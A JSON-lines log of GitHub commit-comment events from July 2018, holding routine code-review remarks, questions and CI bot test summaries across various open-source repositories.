{"id":"8031119430","type":"CommitCommentEvent","actor":{"login":"batsman2skip"},"repo":{"name":"ChainsDD/Superuser"},"payload":{"comment":{"id":29864811,"position":15,"line":103,"path":"AndroidManifest.xml","commit_id":"bb5a006a07b2fbd463a7ca9a6133832485aa3d0f","created_at":"2018-07-27T22:43:14Z","updated_at":"2018-07-27T22:43:14Z","author_association":"NONE","body":"40"}},"created_at":"2018-07-27T22:43:14Z"}
{"id":"8031122733","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29864820,"position":19,"line":17,"path":"test/account-mgmt.test.js","commit_id":"a7fb2073da69ebfcd37576b6a256321f2ff52261","created_at":"2018-07-27T22:44:28Z","updated_at":"2018-07-27T22:44:28Z","author_association":"OWNER","body":"what are some practical use cases for ```this.skip()``` and ```this.timeout()``` though? "}},"created_at":"2018-07-27T22:44:28Z"}
{"id":"8031124439","type":"CommitCommentEvent","actor":{"login":"ecordell"},"repo":{"name":"operator-framework/operator-lifecycle-manager"},"payload":{"comment":{"id":29864823,"position":13,"line":15,"path":"test/schema/catalog_versions_test.go","commit_id":"9d81cb888c00b15dbebf9b27f6774a129e0ae597","created_at":"2018-07-27T22:45:06Z","updated_at":"2018-07-27T22:45:06Z","author_association":"COLLABORATOR","body":"Nit: extra line"}},"created_at":"2018-07-27T22:45:06Z"}
{"id":"8031125772","type":"CommitCommentEvent","actor":{"login":"batsman2skip"},"repo":{"name":"ChainsDD/Superuser"},"payload":{"comment":{"id":29864826,"position":4,"line":27,"path":"res/raw/changelog.txt","commit_id":"bb5a006a07b2fbd463a7ca9a6133832485aa3d0f","created_at":"2018-07-27T22:45:36Z","updated_at":"2018-07-27T22:45:36Z","author_association":"NONE","body":"39"}},"created_at":"2018-07-27T22:45:36Z"}
{"id":"8031126695","type":"CommitCommentEvent","actor":{"login":"ecordell"},"repo":{"name":"operator-framework/operator-lifecycle-manager"},"payload":{"comment":{"id":29864831,"position":111,"line":202,"path":"test/schema/catalog_versions_test.go","commit_id":"9d81cb888c00b15dbebf9b27f6774a129e0ae597","created_at":"2018-07-27T22:45:58Z","updated_at":"2018-07-27T22:45:58Z","author_association":"COLLABORATOR","body":"Nice!"}},"created_at":"2018-07-27T22:45:58Z"}
{"id":"8031127092","type":"CommitCommentEvent","actor":{"login":"sanketjoshi"},"repo":{"name":"hdinsight/hdinsight.github.io"},"payload":{"comment":{"id":29864834,"position":null,"line":null,"path":null,"commit_id":"8ab4fd837b58aec03312ddabc4a57edc25038c0c","created_at":"2018-07-27T22:46:06Z","updated_at":"2018-07-27T22:46:06Z","author_association":"NONE","body":"Adding documentation for add hive custom libs for spark 2.1"}},"created_at":"2018-07-27T22:46:06Z"}
{"id":"8031128775","type":"CommitCommentEvent","actor":{"login":"batsman2skip"},"repo":{"name":"ChainsDD/Superuser"},"payload":{"comment":{"id":29864837,"position":5,"line":20,"path":"AndroidManifest.xml","commit_id":"bb5a006a07b2fbd463a7ca9a6133832485aa3d0f","created_at":"2018-07-27T22:46:46Z","updated_at":"2018-07-27T22:46:46Z","author_association":"NONE","body":"\"3.0.6\""}},"created_at":"2018-07-27T22:46:46Z"}
{"id":"8031130336","type":"CommitCommentEvent","actor":{"login":"KronicDeth"},"repo":{"name":"JetBrains/intellij-community"},"payload":{"comment":{"id":29864842,"position":25,"line":19,"path":"platform/core-api/src/com/intellij/util/QueryExecutor.java","commit_id":"aaed1ccb910f6f4a9ea2f96894d99b6e35a59ef9","created_at":"2018-07-27T22:47:24Z","updated_at":"2018-07-27T22:47:24Z","author_association":"NONE","body":"This breaks Kotlin subclass compatibility if your plugin needs to support < 2018.2 and >= 2018.2 where this change is shipped.  Kotlin requires `override` and in < 2018.2 the type needs to be `Processor<Result>` while in >= 2018.2 it needs to be `Processor<in Result>`.  \r\n\r\nEvent converting back to Java doesn't make this work as it also requires the Result vs ? super Result difference when defining the methods without `@Override`.  I'm stuck with how to support this expect to add a pre-processor to my build."}},"created_at":"2018-07-27T22:47:24Z"}
{"id":"8031131067","type":"CommitCommentEvent","actor":{"login":"itventures111"},"repo":{"name":"itventures111/hello-universe"},"payload":{"comment":{"id":29864844,"position":null,"line":null,"path":null,"commit_id":"c76824d86de894b505d594584a9e174778a25d59","created_at":"2018-07-27T22:47:42Z","updated_at":"2018-07-27T22:47:42Z","author_association":"OWNER","body":"yet another comment"}},"created_at":"2018-07-27T22:47:42Z"}
{"id":"8031136964","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29864860,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T22:49:59Z","updated_at":"2018-07-27T22:49:59Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T22:49:59Z"}
{"id":"8031141051","type":"CommitCommentEvent","actor":{"login":"CJ-Wright"},"repo":{"name":"regro/cf-scripts"},"payload":{"comment":{"id":29864869,"position":null,"line":null,"path":null,"commit_id":"707ca7e40687db09ec3c8e5d3f51602ba520640d","created_at":"2018-07-27T22:51:37Z","updated_at":"2018-07-27T22:51:37Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-27T22:51:37Z"}
{"id":"8031141967","type":"CommitCommentEvent","actor":{"login":"Arcade116"},"repo":{"name":"Arcade116/Discord.NET-Bot"},"payload":{"comment":{"id":29864872,"position":118,"line":135,"path":"src/ArcadesBot/Modules/Games/ChessModule.cs","commit_id":"a00d772fc7c9e10d270ef2195cf7a484eb5fa547","created_at":"2018-07-27T22:52:00Z","updated_at":"2018-07-27T22:52:00Z","author_association":"OWNER","body":"Removed Stats command again because it didn't work how I wanted it to work"}},"created_at":"2018-07-27T22:52:00Z"}
{"id":"8031144713","type":"CommitCommentEvent","actor":{"login":"Arcade116"},"repo":{"name":"Arcade116/Discord.NET-Bot"},"payload":{"comment":{"id":29864874,"position":11,"line":11,"path":"src/ArcadesBot/Modules/TagModule.cs","commit_id":"a00d772fc7c9e10d270ef2195cf7a484eb5fa547","created_at":"2018-07-27T22:53:06Z","updated_at":"2018-07-27T22:53:06Z","author_association":"OWNER","body":"Getting ready to add tags to the bot"}},"created_at":"2018-07-27T22:53:06Z"}
{"id":"8031151639","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/amlogic-e2-procfs"},"payload":{"comment":{"id":29864894,"position":null,"line":null,"path":null,"commit_id":"2b2c5f126cc0f24967616a616eb6c1edb5be89da","created_at":"2018-07-27T22:55:47Z","updated_at":"2018-07-27T22:55:47Z","author_association":"MEMBER","body":"You can check with https://github.com/PLi-metas/extra_rc_models/commit/fcb330e9c78550c7a21cfa461f64c6be0a93895a if you see the new pictures it means it's ok (remotes are a copy of alien5 remote)."}},"created_at":"2018-07-27T22:55:47Z"}
{"id":"8031153143","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29864895,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-27T22:56:22Z","updated_at":"2018-07-27T22:56:22Z","author_association":"OWNER","body":"Alright, so I understand CMY wheels, I understand RGB+WAUV LEDs but I don't understand \"subtractive\" color wheels. I think they are always \"additive\" wheels, since they are basically [rotating gelatines](https://ae01.alicdn.com/kf/HTB1GLj5lhTI8KJjSspiq6zM4FXaV/High-Quality-200W-230W-5R-7R-Stage-Light-Color-Wheel-GOBO-Wheel-For-Moving-Head-Beam.jpg_640x640.jpg).\r\n\r\nSo, I already have the code to blend CMY / RGB / WAUV color sources. I'd say a color wheel gel is just another color on top of the one calculate before."}},"created_at":"2018-07-27T22:56:22Z"}
{"id":"8031156578","type":"CommitCommentEvent","actor":{"login":"batsman2skip"},"repo":{"name":"ChainsDD/su-binary"},"payload":{"comment":{"id":29864910,"position":17,"line":17,"path":"db.c","commit_id":"f79e166005b7a1f56f44ed63941951830cbb3abc","created_at":"2018-07-27T22:57:49Z","updated_at":"2018-07-27T22:57:49Z","author_association":"NONE","body":"\t#include <stdlib.h>"}},"created_at":"2018-07-27T22:57:49Z"}
{"id":"8031156697","type":"CommitCommentEvent","actor":{"login":"breandan"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29864911,"position":21,"line":21,"path":"libraries/stdlib/src/kotlin/io/files/FileTreeWalk.kt","commit_id":"f560677b1520ed6182b7416d0e83e7c4b4fd4906","created_at":"2018-07-27T22:57:51Z","updated_at":"2018-07-27T22:57:51Z","author_association":"NONE","body":"Yes, please!"}},"created_at":"2018-07-27T22:57:51Z"}
{"id":"8031158118","type":"CommitCommentEvent","actor":{"login":"pli41"},"repo":{"name":"pli41/swagger-ui"},"payload":{"comment":{"id":29864916,"position":null,"line":null,"path":null,"commit_id":"a6b8cb7b562949b94760592055b4ff0eb6ac2eb0","created_at":"2018-07-27T22:58:26Z","updated_at":"2018-07-27T22:58:26Z","author_association":"OWNER","body":"Implemented Json editor with package \"react-jsonschema-form\". Currently, format tags like \r\n`type: integer,\r\n format: int64`\r\n are not supported. You could use the file /dev-helpers/swagger.json to test the functionality.\r\n\r\nBTW I do not have prior experience with front end development. Please do correct me if I have done something terrible lol."}},"created_at":"2018-07-27T22:58:26Z"}
{"id":"8031158998","type":"CommitCommentEvent","actor":{"login":"NirobNabil"},"repo":{"name":"TheRSquaredProject/front-end"},"payload":{"comment":{"id":29864921,"position":null,"line":null,"path":null,"commit_id":"67f6b2f5689bf42968fe96b4361eb995d76d55df","created_at":"2018-07-27T22:58:46Z","updated_at":"2018-07-27T22:58:46Z","author_association":"CONTRIBUTOR","body":"clicking only the first person works for now as this one is the only one containing the required infos. the other three are just placeholders for now"}},"created_at":"2018-07-27T22:58:46Z"}
{"id":"8031159071","type":"CommitCommentEvent","actor":{"login":"Balandat"},"repo":{"name":"cornellius-gp/gpytorch"},"payload":{"comment":{"id":29864922,"position":null,"line":null,"path":null,"commit_id":"6bc1a99d7470215ac931fe2fc4126776eb2ffca8","created_at":"2018-07-27T22:58:48Z","updated_at":"2018-07-27T22:58:48Z","author_association":"COLLABORATOR","body":"See here for how to repro the issue with smaller size test X (this is basically the same nb). I wasn't able to repro the index issues with this one, so maybe that was caused by something else.\r\n\r\n[multitask_gp_regression_kronecker_fail.txt](https://github.com/cornellius-gp/gpytorch/files/2237443/multitask_gp_regression_kronecker_fail.txt)\r\n"}},"created_at":"2018-07-27T22:58:48Z"}
{"id":"8031159746","type":"CommitCommentEvent","actor":{"login":"Catfriend1"},"repo":{"name":"syncthing/syncthing-android"},"payload":{"comment":{"id":29864925,"position":null,"line":null,"path":null,"commit_id":"b99d6d47d4fb995dff20ad43a89e56d6db3d3996","created_at":"2018-07-27T22:59:05Z","updated_at":"2018-07-27T22:59:05Z","author_association":"CONTRIBUTOR","body":"Reason for revert: You blocked my valid workaround but made a worse workaround unreviewd on your own with risk of data loss. (Explanation on the forum https://forum.syncthing.net/t/folder-creation-broken-in-android-app/11885/11?u=catfriend1 )\r\nCorrect would have been what you said and I've also agreed: return true in all cases!\r\nBtw your fix was no _proper_ fix!\r\n![image](https://user-images.githubusercontent.com/16361913/43349598-435290fc-9201-11e8-83b4-515ba16a52cf.png)\r\n"}},"created_at":"2018-07-27T22:59:05Z"}
{"id":"8031161505","type":"CommitCommentEvent","actor":{"login":"tlnagy"},"repo":{"name":"mpastell/Weave.jl"},"payload":{"comment":{"id":29864934,"position":null,"line":null,"path":null,"commit_id":"a5ba74dcd1f87e4b0585646cd657dd2e9d5b00c3","created_at":"2018-07-27T22:59:49Z","updated_at":"2018-07-27T22:59:49Z","author_association":"NONE","body":"Why did you remove this line? Shouldn't plots only be installed for the tests?"}},"created_at":"2018-07-27T22:59:49Z"}
{"id":"8031163799","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29864948,"position":null,"line":null,"path":null,"commit_id":"eb3bc11a0dd8f61f39188e05c565d227a59d155c","created_at":"2018-07-27T23:00:37Z","updated_at":"2018-07-27T23:00:37Z","author_association":"OWNER","body":"Does it works?"}},"created_at":"2018-07-27T23:00:37Z"}
{"id":"8031171013","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29864954,"position":185,"line":946,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:03:28Z","updated_at":"2018-07-27T23:03:28Z","author_association":"CONTRIBUTOR","body":"Isn't this supposed to be the network's email now?"}},"created_at":"2018-07-27T23:03:28Z"}
{"id":"8031171568","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864955,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-27T23:03:43Z","updated_at":"2018-07-27T23:03:43Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - x86_64-MacOS-10.9-clang: OK (2945 of 2948 tests passed, 2 test warnings)\n\nMessages:\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO small diffs.\n * 2 tests had: MTR small diffs.\n * 4 tests had: Table small diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: AUD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T23:03:43Z"}
{"id":"8031177001","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29864970,"position":null,"line":null,"path":null,"commit_id":"c7dd9e88b865c765c8ea2a6cd1a6c514d48bd0b2","created_at":"2018-07-27T23:05:55Z","updated_at":"2018-07-27T23:05:55Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/c7dd9e88b865c765c8ea2a6cd1a6c514d48bd0b2/index.html"}},"created_at":"2018-07-27T23:05:55Z"}
{"id":"8031179440","type":"CommitCommentEvent","actor":{"login":"MatthewKush"},"repo":{"name":"MatthewKush/xray-oxygen"},"payload":{"comment":{"id":29864973,"position":null,"line":null,"path":null,"commit_id":"72be8940243157ab76f0645a54c23351ca643780","created_at":"2018-07-27T23:06:57Z","updated_at":"2018-07-27T23:06:57Z","author_association":"OWNER","body":"@ForserX Hi. I just want to push out random helpful things here and there. I am worried that if you guys use my changes, people may be mad due to my horrible reputation. For that reason you do not need my permission, and do not need to credit it me for any work I do here: please use it freely without mentioning me. I'm serious."}},"created_at":"2018-07-27T23:06:57Z"}
{"id":"8031181493","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29864974,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T23:07:52Z","updated_at":"2018-07-27T23:07:52Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2916 of 2948 tests passed, 174 test warnings)\n\nMessages:\n\n * 173 tests had: EIO diffs.\n * 173 tests had: ESO small diffs.\n * 111 tests had: Table small diffs.\n * 125 tests had: MTR small diffs.\n * 28 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 28 tests had: Table big diffs.\n * 10 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\nregression Test Summary\n * Passed: 594\n * Failed: 30\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.91%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T23:07:52Z"}
{"id":"8031183123","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29864975,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:08:33Z","updated_at":"2018-07-27T23:08:33Z","author_association":"CONTRIBUTOR","body":"You've changed the from email to be the standard Cacti Core from settings, which removes the customisation of setting independent emails for different email sources as seen in thold, monitor etc."}},"created_at":"2018-07-27T23:08:33Z"}
{"id":"8031190219","type":"CommitCommentEvent","actor":{"login":"cigamit"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29864991,"position":185,"line":946,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:11:35Z","updated_at":"2018-07-27T23:11:35Z","author_association":"MEMBER","body":"Correct.  The from Name and Email on Mail/DNS page are the default."}},"created_at":"2018-07-27T23:11:35Z"}
{"id":"8031192885","type":"CommitCommentEvent","actor":{"login":"Shadows-of-Fire"},"repo":{"name":"MotherlodeMod/Motherlode"},"payload":{"comment":{"id":29865002,"position":42,"line":70,"path":"src/main/java/motherlode/recipe/ingredient/OreIngredient.java","commit_id":"864e7f5c79d345d765cf616141212697e658fa90","created_at":"2018-07-27T23:12:40Z","updated_at":"2018-07-27T23:12:40Z","author_association":"CONTRIBUTOR","body":"All of this should be inside the `display == null` block instead of just the last line."}},"created_at":"2018-07-27T23:12:40Z"}
{"id":"8031193371","type":"CommitCommentEvent","actor":{"login":"cigamit"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865003,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:12:53Z","updated_at":"2018-07-27T23:12:53Z","author_association":"MEMBER","body":"I did not see the purpose of that, or at least I'm unsure."}},"created_at":"2018-07-27T23:12:53Z"}
{"id":"8031194001","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865007,"position":185,"line":946,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:13:08Z","updated_at":"2018-07-27T23:13:08Z","author_association":"CONTRIBUTOR","body":"Yes, but you can override these with the automation settings which are available so that automation emails are sent from a different address."}},"created_at":"2018-07-27T23:13:08Z"}
{"id":"8031198494","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865012,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:15:06Z","updated_at":"2018-07-27T23:15:06Z","author_association":"CONTRIBUTOR","body":"I have different email rules based on where my emails come from.  For example, thold can be sent as threshold@cacti.sever.net, but monitoring reboots can be sent from monitor@cacti.server.net, so I applied the same logic to automation.  Discover of networks may want to be sent from a different email address than the base server."}},"created_at":"2018-07-27T23:15:06Z"}
{"id":"8031199322","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-amlogic"},"payload":{"comment":{"id":29865018,"position":null,"line":null,"path":null,"commit_id":"f08d8ef520c830c66f5104b106cdef4fdd036384","created_at":"2018-07-27T23:15:24Z","updated_at":"2018-07-27T23:15:24Z","author_association":"MEMBER","body":"It's not ready and that's why I didn't use conf extension, it's a reminder to make this machine available later ..."}},"created_at":"2018-07-27T23:15:24Z"}
{"id":"8031205170","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29865026,"position":null,"line":null,"path":null,"commit_id":"e06297545b9eee92cf049e80611d3a58de208bd7","created_at":"2018-07-27T23:17:55Z","updated_at":"2018-07-27T23:17:55Z","author_association":"NONE","body":"I have lowered throughput of speculative LTC"}},"created_at":"2018-07-27T23:17:55Z"}
{"id":"8031206471","type":"CommitCommentEvent","actor":{"login":"cigamit"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865030,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:18:30Z","updated_at":"2018-07-27T23:18:30Z","author_association":"MEMBER","body":"Then we should move that setting into the automation_network table as well.  If it's blank, it'll use the system default."}},"created_at":"2018-07-27T23:18:30Z"}
{"id":"8031206660","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865031,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T23:18:35Z","updated_at":"2018-07-27T23:18:35Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2957 of 2988 tests passed, 181 test warnings)\n\nMessages:\n\n * 166 tests had: EIO diffs.\n * 180 tests had: ESO small diffs.\n * 102 tests had: Table small diffs.\n * 129 tests had: MTR small diffs.\n * 27 tests had: ESO big diffs.\n * 22 tests had: MTR big diffs.\n * 27 tests had: Table big diffs.\n * 10 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * Failed: 2\n\nregression Test Summary\n * Passed: 615\n * Failed: 29\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.96%25-yellow.png)</a> \n"}},"created_at":"2018-07-27T23:18:35Z"}
{"id":"8031210809","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865037,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:20:28Z","updated_at":"2018-07-27T23:20:28Z","author_association":"CONTRIBUTOR","body":"I think it should three tiered, network table, automation settings, global settings.  Thus you can set it once at the automation level and all networks would get it.  The same with the to address.  I'll do a patch for it over the weekend."}},"created_at":"2018-07-27T23:20:28Z"}
{"id":"8031212027","type":"CommitCommentEvent","actor":{"login":"JunTaoLuo"},"repo":{"name":"aspnet/KestrelHttpServer"},"payload":{"comment":{"id":29865041,"position":5,"line":27,"path":"samples/Http2SampleApp/Program.cs","commit_id":"647e7c326670c0c0fdf865a1a30ba5775ec42cc5","created_at":"2018-07-27T23:20:58Z","updated_at":"2018-07-27T23:20:58Z","author_association":"CONTRIBUTOR","body":"Why the separate calls to UseKestrel and ConfigureKestrel? shouldn't the overload to UseKestrel be sufficient?"}},"created_at":"2018-07-27T23:20:58Z"}
{"id":"8031212673","type":"CommitCommentEvent","actor":{"login":"netniV"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29865042,"position":187,"line":948,"path":"poller_automation.php","commit_id":"8d7ecfe39d27634d1f2a50edd7464b27e2c8d1e0","created_at":"2018-07-27T23:21:15Z","updated_at":"2018-07-27T23:21:15Z","author_association":"CONTRIBUTOR","body":"Should the TO have an option to say whether to combine or replace the to address?"}},"created_at":"2018-07-27T23:21:15Z"}
{"id":"8031214935","type":"CommitCommentEvent","actor":{"login":"mgayheart1"},"repo":{"name":"davetimmins/Anywhere.ArcGIS"},"payload":{"comment":{"id":29865047,"position":null,"line":null,"path":null,"commit_id":"ce8ba663dbfcdec737e24062769c502310f19546","created_at":"2018-07-27T23:22:17Z","updated_at":"2018-07-27T23:22:17Z","author_association":"NONE","body":"I found that BatchQuery doesn't work when SupportPagination is false. I have an updated function that I'll try to contribute back. Thanks!"}},"created_at":"2018-07-27T23:22:17Z"}
{"id":"8031217708","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865051,"position":null,"line":null,"path":null,"commit_id":"1238b103222a373363f7276471723779c2972ce0","created_at":"2018-07-27T23:23:30Z","updated_at":"2018-07-27T23:23:30Z","author_association":"NONE","body":"159313706_Issue#6796 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1238b103222a373363f7276471723779c2972ce0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T23:23:30Z"}
{"id":"8031219056","type":"CommitCommentEvent","actor":{"login":"nedtwigg"},"repo":{"name":"mytakedotorg/mytakedotorg"},"payload":{"comment":{"id":29865054,"position":null,"line":null,"path":null,"commit_id":"3fe3209cedd500ac3ddbf0c2e619522a314c7f6b","created_at":"2018-07-27T23:24:09Z","updated_at":"2018-07-27T23:24:09Z","author_association":"COLLABORATOR","body":"The route for the meta tag img can be `/title/v1/<range>` or it can be `/hashid/<range>`.  The node server can have the entire foundation on its disk, just like the java server has the foundation on its.  Whatever lookups we're asking of the java server, could also be done by node.  I don't have an opinion on whether it should be `name -> hash` or `hash -> name`, but whichever we choose, the java server should be able to serve it with a minimum of parsing.  Want to minimize load on the server that keeps the site alive - not a huge deal if the images go down."}},"created_at":"2018-07-27T23:24:09Z"}
{"id":"8031235226","type":"CommitCommentEvent","actor":{"login":"rahowar1488"},"repo":{"name":"123oleg/wallet"},"payload":{"comment":{"id":29865084,"position":44,"line":123,"path":"app/app.iml","commit_id":"61dfca37f0af819373728a83df4e347dcca5b989","created_at":"2018-07-27T23:31:30Z","updated_at":"2018-07-27T23:31:30Z","author_association":"NONE","body":"I"}},"created_at":"2018-07-27T23:31:30Z"}
{"id":"8031239599","type":"CommitCommentEvent","actor":{"login":"nguyenhoan"},"repo":{"name":"boalang/compiler"},"payload":{"comment":{"id":29865090,"position":7,"line":352,"path":"src/java/boa/runtime/BoaAbstractVisitor.java","commit_id":"1326ea8c94e67f99fedf80e8a6abb8b72bb8bc4d","created_at":"2018-07-27T23:33:14Z","updated_at":"2018-07-27T23:33:14Z","author_association":"CONTRIBUTOR","body":"What about this?\r\nf5d4fcfb1c2194783d17716413845d8175b365f5"}},"created_at":"2018-07-27T23:33:14Z"}
{"id":"8031240763","type":"CommitCommentEvent","actor":{"login":"nongrmt"},"repo":{"name":"mvs-org/lightwallet"},"payload":{"comment":{"id":29865092,"position":11,"line":7,"path":"ionic.config.json","commit_id":"339980d4a8686f9ed99f8ef7e2cc18157bb0e26d","created_at":"2018-07-27T23:33:44Z","updated_at":"2018-07-27T23:33:44Z","author_association":"NONE","body":"Rmtnong1@gmail.com"}},"created_at":"2018-07-27T23:33:44Z"}
{"id":"8031247687","type":"CommitCommentEvent","actor":{"login":"WebsByTodd"},"repo":{"name":"mytakedotorg/mytakedotorg"},"payload":{"comment":{"id":29865099,"position":null,"line":null,"path":null,"commit_id":"3fe3209cedd500ac3ddbf0c2e619522a314c7f6b","created_at":"2018-07-27T23:36:58Z","updated_at":"2018-07-27T23:36:58Z","author_association":"COLLABORATOR","body":"Cool! Thanks for the insight here and in #206. I think we can always name the images the name of the fact instead of using the hash in the image name. This has an added SEO benefit. "}},"created_at":"2018-07-27T23:36:58Z"}
{"id":"8031257375","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29865111,"position":5,"line":30,"path":"pkgs/development/coq-modules/category-theory/default.nix","commit_id":"08bf0b7630afa8656bb36bd61fac8ce9b2aff613","created_at":"2018-07-27T23:41:42Z","updated_at":"2018-07-27T23:41:42Z","author_association":"MEMBER","body":"This gives an eval error:\r\n\r\nhttps://gist.github.com/GrahamcOfBorg/fa748a18fa81cb641730bbdc70c562f9"}},"created_at":"2018-07-27T23:41:42Z"}
{"id":"8031259513","type":"CommitCommentEvent","actor":{"login":"estebanwasinger"},"repo":{"name":"mulesoft/mulesoft-docs"},"payload":{"comment":{"id":29865113,"position":123,"line":89,"path":"connectors/v/latest/ibm-mq-transactions.adoc","commit_id":"ba07e8ec63b364d879ff05eac2c54f69052ae735","created_at":"2018-07-27T23:42:44Z","updated_at":"2018-07-27T23:42:44Z","author_association":"CONTRIBUTOR","body":"Supports a create?"}},"created_at":"2018-07-27T23:42:44Z"}
